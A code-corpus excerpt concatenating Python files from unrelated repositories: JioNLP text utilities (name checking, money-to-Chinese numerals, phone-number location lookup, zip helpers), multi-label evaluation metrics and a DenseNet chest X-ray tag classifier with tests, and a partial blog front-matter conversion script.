and self.chinese_family_name.search(text[1]) is not None:
return True
            # 2. the first two characters are single-character family names combined (e.g. both parents' surnames): "刘王晨曦"
if self.two_char_chinese_family_name.search(text[:2]) is not None:
return True
return False
if text_length == 3:
            # Three-character names
            # 1. the first character is a family name, e.g. "张"
if self.chinese_family_name.search(text[0]) is not None:
return True
            # 2. a two-character family name, e.g. "上官"
if self.two_char_chinese_family_name.search(text[:2]) is not None:
return True
return False
if text_length == 2:
if self.chinese_family_name.search(text[0]) is not None:
return True
return False
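# Illustrative usage (a sketch only; results depend on the family-name patterns imported above):
#   checker = CheckPersonName()
#   checker('欧阳修')  # expected True  -- length 3 with a recognised family name
#   checker('电视机')  # expected False -- no family-name match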
```
#### File: jionlp/gadget/money_num2char.py
```python
import re
class MoneyNum2Char(object):
""" 给定一条数字金额,返回其汉字大写结果。
Args:
num(int|float|str): 数字金额
sim_or_tra(str): 可选 'sim' 或 'tra',控制汉字类型,默认为 'tra'
Returns:
str: 汉字金额
Examples:
>>> import jionlp as jio
>>> num = 120402810.03
>>> print(jio.money_num2char(num, sim_or_tra='tra'))
>>> num = '38,009.0'
>>> print(jio.money_num2char(num, sim_or_tra='sim'))
# 壹亿贰仟零肆拾萬贰仟捌佰壹拾點零叁
# 三万八千零九
"""
def __init__(self):
self.integer_pattern = None
def _prepare(self):
self.simplified_num_char = {
'0': '零', '1': '一', '2': '二', '3': '三', '4': '四',
'5': '五', '6': '六', '7': '七', '8': '八', '9': '九'}
self.traditional_num_char = {
'0': '零', '1': '壹', '2': '贰', '3': '叁', '4': '肆',
'5': '伍', '6': '陆', '7': '柒', '8': '捌', '9': '玖'}
self.simplified_inner_suffix = {
3: '千', 2: '百', 1: '十', 0: ''}
self.simplified_outer_suffix = {
0: '', 1: '万', 2: '亿', 3: '兆'}
self.traditional_inner_suffix = {
3: '仟', 2: '佰', 1: '拾', 0: ''}
self.traditional_outer_suffix = {
0: '', 1: '萬', 2: '亿', 3: '兆'}
self.money_char = {1: '分', 0: '角'}
self.integer_pattern = re.compile('(\d+)\.')
self.float_pattern = re.compile('\.(\d+)')
self.zero_cut_pattern = re.compile('零+$')
self.zero_shorten_pattern = re.compile('零+')
self.zero_delete_pattern = re.compile('^0+$')
self.sim_deci_start_pattern = re.compile('^(一十)')
self.tra_deci_start_pattern = re.compile('^(壹拾)')
def __call__(self, num, sim_or_tra='tra'):
""" 调用函数 """
if self.integer_pattern is None:
self._prepare()
integer_part = None
float_part = None
if type(num) is int:
num_string = str(num)
integer_part = num_string
elif type(num) is float:
num_string = str(num)
integer_part = self.integer_pattern.search(num_string).group(1)
float_part = self.float_pattern.search(num_string).group(1)
elif type(num) is str:
num_string = num.replace(',', '')
if '.' not in num_string:
integer_part = num_string
else:
integer_part = self.integer_pattern.search(num_string).group(1)
float_part = self.float_pattern.search(num_string).group(1)
integer_seg_list = self._seg_integer_part(integer_part)
integer_char_list = list()
for idx, seg in enumerate(range(len(integer_seg_list) - 1, -1, -1)):
seg_char = self._parse_integer_seg(integer_seg_list[idx], sim_or_tra=sim_or_tra)
if sim_or_tra == 'sim':
integer_char_list.append(seg_char + self.simplified_outer_suffix[seg])
elif sim_or_tra == 'tra':
integer_char_list.append(seg_char + self.traditional_outer_suffix[seg])
integer_string = ''.join(integer_char_list)
if float_part is not None:
matched = self.zero_delete_pattern.match(float_part[:2])
if matched is not None:
return integer_string
float_string = self._float2string(
float_part[:2], sim_or_tra=sim_or_tra)
if sim_or_tra == 'sim':
dot_string = '点'
elif sim_or_tra == 'tra':
dot_string = '點'
return integer_string + dot_string + float_string
return integer_string
@staticmethod
def _seg_integer_part(integer_part):
""" 将整数转换为每 4 个一节 """
seg_list = list()
flag = len(integer_part) % 4
if len(integer_part) % 4 != 0:
first_part = integer_part[:flag]
seg_list.append(first_part)
for i in range(flag, len(integer_part), 4):
seg_list.append(integer_part[i: i+4])
return seg_list
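    # Worked example: _seg_integer_part('120402810') -> ['1', '2040', '2810']
    # (the leading group takes len % 4 digits, the rest are full four-digit groups).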
def _parse_integer_seg(self, integer_seg, sim_or_tra='sim'):
""" 将整数的每 4 个一节转换为汉字 """
thousand = ''
hundred = ''
deci = ''
enum = ''
for idx, i in enumerate(range(len(integer_seg) - 1, -1, -1)):
if idx == 0:
if integer_seg[i] == '0':
enum = ''
else:
if sim_or_tra == 'sim':
enum = self.simplified_num_char[integer_seg[i]]
elif sim_or_tra == 'tra':
enum = self.traditional_num_char[integer_seg[i]]
elif idx == 1:
if integer_seg[i] == '0':
deci = '零'
else:
if sim_or_tra == 'sim':
deci = self.simplified_num_char[integer_seg[i]] + '十'
elif sim_or_tra == 'tra':
deci = self.traditional_num_char[integer_seg[i]] + '拾'
elif idx == 2:
if integer_seg[i] == '0':
hundred = '零'
else:
if sim_or_tra == 'sim':
hundred = self.simplified_num_char[integer_seg[i]] + '百'
elif sim_or_tra == 'tra':
hundred = self.traditional_num_char[integer_seg[i]] + '佰'
elif idx == 3:
if integer_seg[i] == '0':
thousand = '零'
else:
if sim_or_tra == 'sim':
thousand = self.simplified_num_char[integer_seg[i]] + '千'
elif sim_or_tra == 'tra':
thousand = self.traditional_num_char[integer_seg[i]] + '仟'
tmp_res = ''.join([thousand, hundred, deci, enum])
tmp_res = self.zero_cut_pattern.sub('', tmp_res)
tmp_res = self.zero_shorten_pattern.sub('零', tmp_res)
if sim_or_tra == 'sim':
tmp_res = self.sim_deci_start_pattern.sub('十', tmp_res)
elif sim_or_tra == 'tra':
tmp_res = self.tra_deci_start_pattern.sub('拾', tmp_res)
return tmp_res
def _float2string(self, float_part, sim_or_tra='sim'):
""" 将小数转换为汉字,并仅截取两位(金额只保留 2 位) """
float_string_list = list()
for i in float_part:
if sim_or_tra == 'sim':
float_string_list.append(self.simplified_num_char[i])
elif sim_or_tra == 'tra':
float_string_list.append(self.traditional_num_char[i])
float_string = ''.join(float_string_list)
return float_string
```
#### File: jionlp/gadget/phone_location.py
```python
import re
from jionlp.rule.rule_pattern import CELL_PHONE_CHECK_PATTERN, \
LANDLINE_PHONE_CHECK_PATTERN, LANDLINE_PHONE_AREA_CODE_PATTERN
from jionlp.dictionary.dictionary_loader import phone_location_loader, \
telecom_operator_loader
from jionlp.gadget.trie_tree import TrieTree
class PhoneLocation(object):
""" 对于给定的电话号码,返回其归属地、区号、运营商等信息。
该方法与 jio.extract_phone_number 配合使用。
Args:
text(str): 电话号码文本。若输入为 jio.extract_phone_number 返回的结果,效果更佳。
注意,仅输入电话号码文本,如 "86-17309729105"、"13499013052"、"021 60128421" 等,
而 "81203432" 这样的电话号码则没有对应的归属地。
若输入 "343981217799212723" 这样的文本,会造成误识别,须首先从中识别电话号码,再进行
归属地、区号、运营商的识别
Returns:
dict: 该电话号码的类型,归属地,手机运营商
Examples:
>>> import jionlp as jio
>>> text = '联系电话:13288568202. (021)32830431'
>>> num_list = jio.extract_phone_number(text)
>>> print(num_list)
>>> res = [jio.phone_location(item['text']) for item in num_list]
>>> print(res)
# [{'text': '13288568202', 'offset': (5, 16), 'type': 'cell_phone'},
{'text': '(021)32830431', 'offset': (18, 31), 'type': 'landline_phone'}]
# {'number': '(021)32830431', 'province': '上海', 'city': '上海', 'type': 'landline_phone'}
# {'number': '13288568202', 'province': '广东', 'city': '揭阳',
'type': 'cell_phone', 'operator': '中国联通'}
"""
def __init__(self):
self.cell_phone_location_trie = None
def _prepare(self):
""" 加载词典 """
cell_phone_location, zip_code_location, area_code_location = phone_location_loader()
self.zip_code_location = zip_code_location
self.area_code_location = area_code_location
self.cell_phone_location_trie = TrieTree()
for num, loc in cell_phone_location.items():
self.cell_phone_location_trie.add_node(num, loc)
self.cell_phone_pattern = re.compile(CELL_PHONE_CHECK_PATTERN)
self.landline_phone_pattern = re.compile(LANDLINE_PHONE_CHECK_PATTERN)
self.landline_area_code_pattern = re.compile(LANDLINE_PHONE_AREA_CODE_PATTERN)
        # telecom operator (carrier) dictionary
telecom_operator = telecom_operator_loader()
self.telecom_operator_trie = TrieTree()
for num, loc in telecom_operator.items():
self.telecom_operator_trie.add_node(num, loc)
def __call__(self, text):
""" 输入一段电话号码文本,返回其结果 """
if self.cell_phone_location_trie is None:
self._prepare()
res = self.cell_phone_pattern.search(text)
        if res is not None:  # matched a cell-phone number
cell_phone_number = res.group()
first_seven = cell_phone_number[:7]
_, location = self.cell_phone_location_trie.search(first_seven)
province, city = location.split(' ')
# print(province, city)
_, operator = self.telecom_operator_trie.search(cell_phone_number[:4])
return {'number': text, 'province': province, 'city': city,
'type': 'cell_phone', 'operator': operator}
res = self.landline_phone_pattern.search(text)
        if res is not None:  # matched a landline number
            # extract the landline area code
res = self.landline_area_code_pattern.search(text)
if res is not None:
area_code = res.group(1)
province, city = self.area_code_location.get(area_code, ' ').split(' ')
if province == '':
province, city = None, None
return {'number': text, 'province': province,
'city': city, 'type': 'landline_phone'}
else:
return {'number': text, 'province': None,
'city': None, 'type': 'landline_phone'}
return {'number': text, 'province': None,
'city': None, 'type': 'unknown'}
def landline_phone_location(self, phone_num):
""" 检索固定电话号码城市区号并返回,即已知输入是固话号码 """
if self.cell_phone_location_trie is None:
self._prepare()
        # extract the landline area code
res = self.landline_area_code_pattern.search(phone_num)
if res is not None:
area_code = res.group(1)
province, city = self.area_code_location.get(area_code, ' ').split(' ')
if province == '':
province, city = None, None
return {'number': phone_num, 'province': province,
'city': city, 'type': 'landline_phone'}
else:
return {'number': phone_num, 'province': None,
'city': None, 'type': 'landline_phone'}
def cell_phone_location(self, phone_num):
""" 检索手机号码城市区号并返回,即已知输入是手机号 """
if self.cell_phone_location_trie is None:
self._prepare()
res = self.cell_phone_pattern.search(phone_num)
cell_phone_number = res.group()
first_seven = cell_phone_number[:7]
_, location = self.cell_phone_location_trie.search(first_seven)
province, city = location.split(' ')
_, operator = self.telecom_operator_trie.search(cell_phone_number[:4])
return {'number': phone_num, 'province': province, 'city': city,
'type': 'cell_phone', 'operator': operator}
```
#### File: jionlp/util/zip_file.py
```python
import os
import shutil
import zipfile
FILE_PATH = os.path.abspath(__file__)
DIR_PATH = os.path.dirname(os.path.dirname(FILE_PATH))
UNZIP_FILE_LIST = [
'china_location.txt', 'chinese_char_dictionary.txt',
'chinese_idiom.txt', 'chinese_word_dictionary.txt',
'idf.txt',
'pinyin_phrase.txt', 'sentiment_words.txt',
'char_distribution.json', 'word_distribution.json',
'word_topic_weight.json', 'topic_word_weight.json',
'phone_location.txt', 'xiehouyu.txt',
'pornography.txt']
ZIP_FILE_LIST = [
'china_location.zip', 'chinese_char_dictionary.zip',
'chinese_idiom.zip', 'chinese_word_dictionary.zip',
'idf.zip',
'pinyin_phrase.zip', 'sentiment_words.zip',
'char_distribution.zip', 'word_distribution.zip',
'word_topic_weight.zip', 'topic_word_weight.zip',
'phone_location.zip', 'xiehouyu.zip',
'pornography.zip']
def zip_file(file_list=None):
""" 将某些 txt, json 文件压缩 """
if file_list is None:
file_list = UNZIP_FILE_LIST
elif type(file_list) is str:
file_list = [file_list]
dict_dir_path = os.path.join(DIR_PATH, 'dictionary')
for _file in file_list:
dict_file_path = os.path.join(dict_dir_path, _file)
tmp_file_path = os.path.join(os.getcwd(), _file)
shutil.copyfile(dict_file_path, tmp_file_path)
zip_file_name = _file.split('.')[0] + '.zip'
with zipfile.ZipFile(os.path.join(dict_dir_path, zip_file_name),
'w', zipfile.ZIP_DEFLATED) as zf:
# zf.write(os.path.join(dict_dir_path, _file))
zf.write(_file)
os.remove(tmp_file_path)
def unzip_file(file_list=None):
""" 将某些 txt 文件解压缩 """
if file_list is None:
file_list = ZIP_FILE_LIST
elif type(file_list) is str:
file_list = [file_list]
dict_dir_path = os.path.join(DIR_PATH, 'dictionary')
for _zip_file in file_list:
zip_file_path = os.path.join(dict_dir_path, _zip_file)
with zipfile.ZipFile(zip_file_path, 'r') as zf:
assert len(zf.namelist()) == 1
for _file in zf.namelist():
zf.extract(_file, dict_dir_path)
```
#### File: JioNLP/test/test_idiom_solitaire.py
```python
import unittest
import jionlp as jio
class TestIdiomSolitaire(unittest.TestCase):
""" 测试地址解析工具 """
def test_idiom_solitaire(self):
""" test func idiom_solitaire """
idiom = '道阻且长'
idiom = jio.idiom_solitaire(idiom, same_pinyin=False, same_tone=True)
self.assertEqual(idiom[0], '长')
idiom = jio.idiom_solitaire('', same_pinyin=False, same_tone=True)
self.assertEqual(idiom, '')
if __name__ == '__main__':
suite = unittest.TestSuite()
test_idiom_solitaire = [TestIdiomSolitaire('test_idiom_solitaire')]
suite.addTests(test_idiom_solitaire)
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
``` |
{
"source": "Ji4chenLi/medical_images",
"score": 2
} |
#### File: Ji4chenLi/medical_images/evaluation_metrics.py
```python
from abc import ABC
from typing import Optional, Sequence, TypeVar
from sklearn.metrics import roc_auc_score
import numpy as np
from texar.torch.run.metric.base_metric import SimpleMetric, StreamingMetric
Input = TypeVar('Input')
Value = TypeVar('Value')
class MultiLabelStreamingMetric(StreamingMetric[Input, Value]):
r"""Base class of multi-label streaming metrics
that support incremental computation.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def __init__(self, num_label: int, *args, **kwargs) -> None:
self.num_label = num_label
super().__init__(*args, **kwargs)
def value(self) -> Value:
raise NotImplementedError
class _MultiLabelConfusionMatrix(MultiLabelStreamingMetric[Input, Value], ABC):
r"""Please refer details to ``sklearn.metrics.multilabel_confusion_matrix``
"""
tp_sum: np.array
pred_sum: np.array
true_sum: np.array
matrix: np.array
def reset(self) -> None:
super().reset()
self.matrix = None
self.tp_sum = np.zeros(self.num_label)
self.pred_sum = np.zeros(self.num_label)
self.true_sum = np.zeros(self.num_label)
def add(self, predicted: Sequence[Input], labels: Sequence[Input]) -> None:
r"""Update the confusion matrix using the results calculated for
the current batch. Specifically, update
self.tp_sum (total number of TP for each label)
self.pred_sum (total number of TP + FP for each label)
self.true_sum (total number of TP + FN for each label)
Keyword Args:
predicted: One-hot representation of the predicted results.
Dimension [batch size, num_label]
label_name: One-hot representation of the target labels.
Dimension [batch size, num_label]
"""
super().add(predicted, labels)
predicted = np.array(predicted)
labels = np.array(labels)
sum_axis = 0
true_and_pred = predicted * labels
self.tp_sum += np.sum(true_and_pred, axis=sum_axis)
self.pred_sum += np.sum(predicted, axis=sum_axis)
self.true_sum += np.sum(labels, axis=sum_axis)
fp = self.pred_sum - self.tp_sum
fn = self.true_sum - self.tp_sum
tp = self.tp_sum
tn = self.count - tp - fp - fn
self.matrix = np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)
def _safe_divide(self, numerator: np.ndarray, denominator: np.ndarray) \
-> np.ndarray:
# Credit: sklearn.metrics.classification._prf_divide
if numerator.size == 1:
if denominator == 0.0:
return np.array(0.0)
return numerator / denominator
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1.0
value = numerator / denominator
return value
class MultiLabelConfusionMatrix(
_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]
):
r"""The confusion matrix is an evaluation metric for
multi-label classification tasks.
The values are averaged across different labels, with matrix[0, 0] representing
TN, matrix[0, 1] representing FP, matrix[1, 0] representing FN,
and matrix[1, 1] representing TP.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> Optional[np.ndarray]:
# Dimension of self.matrix: [num_label]
return np.mean(self.matrix, axis=0)
def better(self, cur: Value, prev: Value) -> Optional[bool]:
# Always return `None` to indicate values are uncomparable.
return None
class MultiLabelPrecision(
_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]
):
r"""The precision metric for multi-label classification tasks. Precision is
defined as the ratio of ``tp / (tp + fp)``, where ``tp`` is the number of
true positives and ``fp`` is the number of false positives.
The values are averaged across different labels.
MultiLabelPrecision values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
if self.count == 0:
return np.zeros(self.num_label).mean()
numerator = self.matrix[:, 1, 1] # tp
denominator = self.matrix[:, 1, 1] + self.matrix[:, 0, 1] # tp + fp
value = self._safe_divide(numerator, denominator)
return value.mean()
class MultiLabelRecall(_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]):
r"""The recall metric for multi-label classification tasks. Recall is
defined as the ratio of ``tp / (tp + fn)``, where ``tp`` is the number of
true positives and ``fn`` is the number of false negatives. The values are
averaged across different labels.
MultiLabelRecall values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
if self.count == 0:
return np.zeros(self.num_label).mean()
numerator = self.matrix[:, 1, 1] # tp
denominator = self.matrix[:, 1, 1] + self.matrix[:, 1, 0] # tp + fn
value = self._safe_divide(numerator, denominator)
return value.mean()
class MultiLabelF1(
MultiLabelPrecision[Input], MultiLabelRecall[Input]
):
r"""The F1 metric for multi-label classification tasks. MultiLabelF1
is defined as the harmonic mean of MultiLabelPrecision and MultiLabelRecall.
MultiLabelF1 requires both predicted values and labels.
MultiLabelF1 values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
precision = MultiLabelPrecision.value(self)
recall = MultiLabelRecall.value(self)
f1 = self._safe_divide(
2 * precision * recall, precision + recall) # type: ignore
# pylint: enable=protected-access
return f1
class HammingLoss(MultiLabelStreamingMetric[Input, float]):
r"""The HammingLoss metric for label classification tasks. HammingLoss is
defined as the fraction of labels that are incorrectly predicted
HammingLoss are :class:`float`numbers between 0 and 1,
with lower values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
correct: np.ndarray
def reset(self) -> None:
super().reset()
self.correct = np.zeros(self.num_label)
def add(self, predicted: Sequence[Input], labels: Sequence[Input]) -> None:
super().add(predicted, labels)
predicted = np.array(predicted)
labels = np.array(labels)
self.correct += np.sum(predicted == labels, axis=0)
def value(self):
if self.count == 0:
return np.zeros(self.num_label).mean()
return np.mean(self.count - self.correct) / self.count
class RocAuc(SimpleMetric[Input, float]):
r"""Compute Area Under the Receiver Operating
Characteristic Curve (ROC AUC) from prediction scores.
Please refer details to sklearn.metrics.roc_auc_score"""
def _value(self) -> Value:
labels = np.stack(self.labels, axis=0)
probs = np.stack(self.predicted, axis=0)
try:
score = roc_auc_score(labels, probs)
except (ValueError, AttributeError):  # roc_auc_score raises ValueError when labels contain a single class
score = 0.
return score
```
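For reference, a standalone NumPy sketch (an illustration, not code from this repo) of the per-label counts that `_MultiLabelConfusionMatrix.add` accumulates and how `MultiLabelPrecision`, `MultiLabelRecall`, and `MultiLabelF1` macro-average them:
```python
import numpy as np

def multilabel_counts(predicted, labels):
    """predicted/labels: one-hot arrays of shape [batch_size, num_label]."""
    tp = np.sum(predicted * labels, axis=0)   # true positives per label
    pred_sum = np.sum(predicted, axis=0)      # tp + fp per label
    true_sum = np.sum(labels, axis=0)         # tp + fn per label
    return tp, pred_sum, true_sum

pred = np.array([[1, 0, 1], [0, 1, 1]])
gold = np.array([[1, 0, 0], [0, 1, 1]])
tp, pred_sum, true_sum = multilabel_counts(pred, gold)

# safe divisions, then average across labels as the metric classes above do
precision = np.divide(tp, pred_sum, out=np.zeros_like(tp, dtype=float), where=pred_sum > 0)
recall = np.divide(tp, true_sum, out=np.zeros_like(tp, dtype=float), where=true_sum > 0)
denom = precision + recall
f1 = np.divide(2 * precision * recall, denom, out=np.zeros_like(denom), where=denom > 0)
print(precision.mean(), recall.mean(), f1.mean())  # 0.833..., 1.0, 0.888...
```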
#### File: medical_images/models/cv_model.py
```python
from typing import Dict, Any
import os.path as osp
import warnings
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as tvm
# Texar Library
from texar.torch import ModuleBase
class SimpleFusionEncoder(ModuleBase):
r"""Visual feature extractor. Implementation is adapted
from
https://gitlab.int.petuum.com/shuxin.yao/image_report_generation/blob/master/implementation/Encoders/Encoders.py
Base encoder is set to be DenseNet121. Pretrained weights
are reused from https://github.com/berneylin/chexnet
NOTE: The output features are not a vector. Instead, we
treat the output from the feature layer of the densenet
as the features, and reshape it to [batch size, out_features, -1]
"""
def __init__(self):
super().__init__()
self.cnn = tvm.densenet121(pretrained=True)
self._load_from_ckpt()
self.out_features = self.cnn.classifier.in_features
def _load_from_ckpt(self):
ckpt = './model.pth.tar'
if osp.exists(ckpt):
pretrained_weight = torch.load(ckpt)['state_dict']
new_state_dict = {}
prefix = 'module.dense_net_121.'
for k, v in pretrained_weight.items():
if 'classifier' not in k:
new_k = k[len(prefix):]
new_state_dict[new_k] = v
msg = self.cnn.load_state_dict(new_state_dict, strict=False)
assert set(msg.missing_keys) == {
"classifier.weight",
"classifier.bias"
}, set(msg.missing_keys)
else:
Warning("No pretrained model is loaded!")
def forward(self, images):
r"""
Extract visual features from the input images
Args:
images (torch.Tensor): dimension
[batch size, channels, height, width]
Returns:
res (torch.Tensor): dimension
[batch size, out_features, 49 = 7 * 7]
"""
batch_size = images.shape[0]
res = self.cnn.features(images)
res = res.view(batch_size, self.out_features, -1)
return res
class MLC(ModuleBase):
r"""Multilabel classifier
Args:
hparams (dict or HParams, optional): MLC hyperparameters.
Missing hyperparameters will be set to default values.
See :meth:`default_hparams` for the hyperparameter structure
and default values.
* fc_in_features (int): Dimension of input visual features
* num_tags (int): Number of tags in total
"""
def __init__(self, hparams=None):
super().__init__(hparams=hparams)
self.classifier = nn.Linear(
in_features=self.hparams.fc_in_features,
out_features=self.hparams.num_tags)
# As per the wingspan project
nn.init.kaiming_normal_(
self.classifier.weight, mode='fan_in')
self.classifier.bias.data.fill_(0)
def forward(self, visual_feature):
r"""Generate logits (scores) for all tags given
the input visual_feature
Args:
visual_feature (torch.Tensor): dimension
[batch size, num_visual_features, visual_dim]
Returns:
tag_scores (torch.Tensor): scores for all tags.
Dimension [batch size, num_tags]
"""
flat_feature = F.avg_pool1d(
visual_feature,
visual_feature.size(-1)
).squeeze(-1)
tag_scores = self.classifier(flat_feature)
return tag_scores
def get_tag_probs(self, visual_feature):
r"""Generate probability distributions for all tags given
the input visual_feature
Args:
visual_feature (torch.Tensor): dimension
[batch size, num_visual_features, visual_dim]
Returns:
tag_probs (torch.Tensor): probability distributions
for all tags. Dimension [batch size, num_tags]
"""
tag_scores = self.forward(visual_feature)
tag_probs = torch.sigmoid(tag_scores)
return tag_probs
@staticmethod
def default_hparams() -> Dict[str, Any]:
r"""Returns a dictionary of hyperparameters with default values.
Returns: (dict) default hyperparameters
"""
return {
'num_tags': 210,
'fc_in_features': 1024,
}
class MLCTrainer(ModuleBase):
r""" Trainer for the Multilabel classifier
Args:
hparams (dict or HParams, optional): MLCTrainer hyperparameters.
Missing hyperparameters will be set to default values.
See :meth:`default_hparams` for the hyperparameter structure
and default values.
* num_tags (int): Number of tags in total
* threshold (float): Threshold to determine if a tag is active
or not
* train_encoder (bool): indicate whether keep training
the encoder or not
"""
def __init__(self, hparams=None):
super().__init__(hparams=hparams)
self.extractor = SimpleFusionEncoder()
hparams_mlc = {
'num_tags': self.hparams.num_tags,
'fc_in_features': self.extractor.out_features,
}
self.mlc = MLC(hparams_mlc)
self.threshold = self.hparams.threshold
self.train_encoder = self.hparams.train_encoder
self.loss = nn.BCEWithLogitsLoss()
def forward(self, batch):
r"""Generate logits (scores) for all tags given
the input visual_feature
Args:
batch (tx.torch.data.Batch[str, Union[torch.Tensor, int]]):
* batch_size: batch size
* label: Dimension [batch size, num_tags]
* img_tensor: Dimension [batch size, channels, height, width]
* token_tensor: Dimension
[batch size, max_sentence_num + 1, max_word_num]
* stop_prob: Dimension [batch size, max_sentence_num + 1]
Returns:
loss (torch.float): classification loss
preds (torch.Tensor): indicators of whether a tag
is active. Dimension [batch size, num_tags]
probs (torch.Tensor): probability distributions
for all tags. Dimension [batch size, num_tags]
"""
if self.train_encoder:
visual_feature = self.extractor(batch.img_tensor)
else:
with torch.no_grad():
visual_feature = self.extractor(batch.img_tensor)
tag_scores = self.mlc(visual_feature)
loss = self.loss(tag_scores, batch.label)
probs = torch.sigmoid(tag_scores)
preds = (probs > self.threshold).to(torch.float)
return {"loss": loss, "preds": preds, "probs": probs}
@staticmethod
def default_hparams() -> Dict[str, Any]:
r"""Returns a dictionary of hyperparameters with default values.
Returns: (dict) default hyperparameters
"""
return {
'num_tags': 210,
'threshold': 0.5,
'train_encoder': False
}
if __name__ == "__main__":
m = MLCTrainer()
```
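A plain-PyTorch shape sketch (an illustration independent of texar, not code from this repo) of the pooling-plus-linear step that `MLC.forward` applies to the encoder output:
```python
import torch
import torch.nn as nn
import torch.nn.functional as F

batch_size, fc_in_features, num_tags = 4, 1024, 210
visual_feature = torch.randn(batch_size, fc_in_features, 49)  # stand-in for SimpleFusionEncoder output

# global average pooling over the 7x7=49 spatial positions, then one score per tag
flat_feature = F.avg_pool1d(visual_feature, visual_feature.size(-1)).squeeze(-1)
classifier = nn.Linear(fc_in_features, num_tags)
tag_scores = classifier(flat_feature)   # logits
tag_probs = torch.sigmoid(tag_scores)   # per-tag probabilities

print(flat_feature.shape, tag_scores.shape, tag_probs.shape)
# torch.Size([4, 1024]) torch.Size([4, 210]) torch.Size([4, 210])
```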
#### File: medical_images/tests/test_cv_model.py
```python
import unittest
import torch
from texar.torch.data.data.data_iterators import DataIterator
from config import transforms, pathologies
from iu_xray_data import IU_XRay_Dataset
from models.cv_model import SimpleFusionEncoder, MLC, MLCTrainer
class TestVisualModel(unittest.TestCase):
r"""
Unit test for CV Model
"""
def setUp(self):
self.batch_size = 4
self.num_label = len(pathologies)
data_hparams = {
"datasource":{
"img_root": "tests/test_iu_xray_data/iu_xray_images",
"text_root": "tests/test_iu_xray_data/text_root",
"vocab_path": "tests/test_iu_xray_data/test_vocab.txt",
"transforms": transforms,
"pathologies": pathologies,
},
"batch_size": self.batch_size,
"shuffle": False,
}
dataset = IU_XRay_Dataset(data_hparams)
dataset.to(torch.device('cpu'))
self.loader = DataIterator(dataset)
self.extractor = SimpleFusionEncoder()
mlc_hparam = {
'num_tags': len(pathologies),
}
self.mlc = MLC(mlc_hparam)
self.mlc_trainer = MLCTrainer(mlc_hparam)
self.loss = torch.nn.BCEWithLogitsLoss()
def test_visual_extractor(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
visual_feature = self.extractor(img_tensor)
self.assertEqual(
visual_feature.size(),
torch.Size([4, 1024, 49]))
def test_mlc(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
visual_feature = self.extractor(img_tensor)
pred_score = self.mlc(visual_feature)
pred_prob = self.mlc.get_tag_probs(visual_feature)
self.assertEqual(
pred_score.size(),
torch.Size([4, self.num_label])
)
self.assertTrue(
torch.equal(
torch.sigmoid(pred_score),
pred_prob
)
)
def test_mlc_trainer(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
label = batch.label
result = self.mlc_trainer(batch)
visual_feature = self.mlc_trainer.extractor(img_tensor)
pred_score = self.mlc_trainer.mlc(visual_feature)
pred_probs = self.mlc_trainer.mlc.get_tag_probs(visual_feature)
self.assertTrue(torch.equal(
pred_probs, result['probs']))
self.assertTrue(torch.equal(
self.loss(pred_score, label),
result['loss']))
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "Ji4n1ng/blog",
"score": 3
} |
#### File: blog/scripts/OldToNew.py
```python
import re, sys, getopt, os, shutil
def usage():
print(
"""
------- OldToNew.py Usage -------
--help: show help information
-h or --help: show help information
-s or --source: path of the source files e.g. path/to/source/
-o or --output: path of the output files e.g. path/to/output/
-----------------------------------
"""
)
def gotError(reason):
print('[Error] ' + reason)
usage()
sys.exit()
def log(information):
print('[Info] ' + information)
def createDirectory(path):
if not os.path.exists(path):
os.makedirs(path)
def getAllFileUnderDirectory(path):
if not os.path.exists(path):
gotError('path: \'' + path + '\' does not exist')
files = []
for (directoryPath, directoryNames, fileNames) in os.walk(path):
for fileName in fileNames:
if fileName.startswith('.'):
continue
filePath = os.path.join(directoryPath, fileName)
files.append((fileName, filePath))
break
return files
def oldToNew(inputSourcePath, inputOutputPath):
if not os.path.exists(inputOutputPath):
gotError('path: \'' + inputOutputPath + '\' does not exist')
files = getAllFileUnderDirectory(inputSourcePath)
for _, filePath in files:
file = open(filePath)
resultFileDate = ''
resultData = ''
for line in file:
if line.startswith('date: '):
date = line.split()
resultFileDate = date[1]
if line.startswith('thumbnail:'):
line = line.replace('thumbnail:', 'background:')
resultData += line
resultFileRootPath = os.path.join(inputOutputPath, resultFileDate)
createDirectory(resultFileRootPath)
resultFilePath = os.path.join(resultFileRootPath, 'index.md')
resultFile = open(resultFilePath, 'w+')
resultFile.write(resultData)
# if inputOutputPath == '':
# fileNameWithoutPath = os.path.split(inputSourceFileName)[1]
# fileNameWithoutExtension = removeExtension(fileNameWithoutPath)
# if '-SignatureBackward' in fileNameWithoutExtension:
